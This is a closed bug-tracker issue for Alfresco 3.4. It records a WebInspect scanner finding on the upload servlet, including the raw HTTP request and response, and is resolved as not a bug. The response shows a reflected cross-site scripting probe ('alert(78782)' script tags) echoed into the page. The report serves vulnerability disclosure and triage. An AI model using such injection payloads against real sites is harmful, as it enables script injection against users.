Details

    • Type: Bug
    • Status: Closed
    • Resolution: Not a bug
    • Affects Version/s: 3.4
    • Fix Version/s: 3.4.5
    • Component/s: Installer
    • Labels:
      None
    • Bug Priority:
      Category 1

      Description

      The following has been detected by WebInspect:

      Attack Request: POST /alfresco/uploadFileServlet HTTP/1.1
      Accept: /
      Referer: http://xx:8090/alfresco/faces/jsp/browse/browse.jsp
      Accept-Language: en-us
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
      Content-Type: multipart/form-data; boundary=---------------------------7db29b182e0418
      Accept-Encoding: gzip, deflate
      Host: 172.17.178.144:8090
      Content-Length: 13106
      Pragma: no-cache
      Connection: Keep-Alive
      Cookie: JSESSIONID=74D624BC200301B1C875E92E94F62483;CustomCookie=WebInspect69878ZXBE464EB522584864BD7EDE7A3DAE5C10Y4ADD
      ...TRUNCATED...:window.parent.upload_complete_helper(''</sCrIpT><sCrIpT>alert(78782)</sCrIpT>,{error: '${_UPLOAD_ERROR}', fileTypeImage: '${_FILE_TYPE_IMAGE}'})
      -----------------------------7db29b182e04...TRUNCATED...
      Vulnerability (Classic) Report Date: 8/4/2011
      Attack Response: HTTP/1.1 200 OK
      Server: Apache-Coyote/1.1
      X-XSS-Protection: 0
      Content-Type: text/html;charset=utf-8
      Content-Length: 216
      Date: Thu, 04 Aug 2011 11:51:28 GMT
      Connection: close
      ...TRUNCATED...ascript">
      window.parent.upload_complete_helper(''</sCrIpT><sCrIpT>alert(78782)</sCrIpT>,{error: '${_UPLOAD_ERROR}', fileTypeImage: '${_FI...TRUNCATED...
      File Names: http://xx:8090/alfresco/uploadFileServlet
      http://xx.xx.xx.xx8090/alfresco/uploadFileServlet
      http://xx.xx.xx.xx:8090/alfresco/uploadFileServlet

              People

              • Assignee:
                closedissues Closed Issues
                Reporter:
                cms cms (Inactive)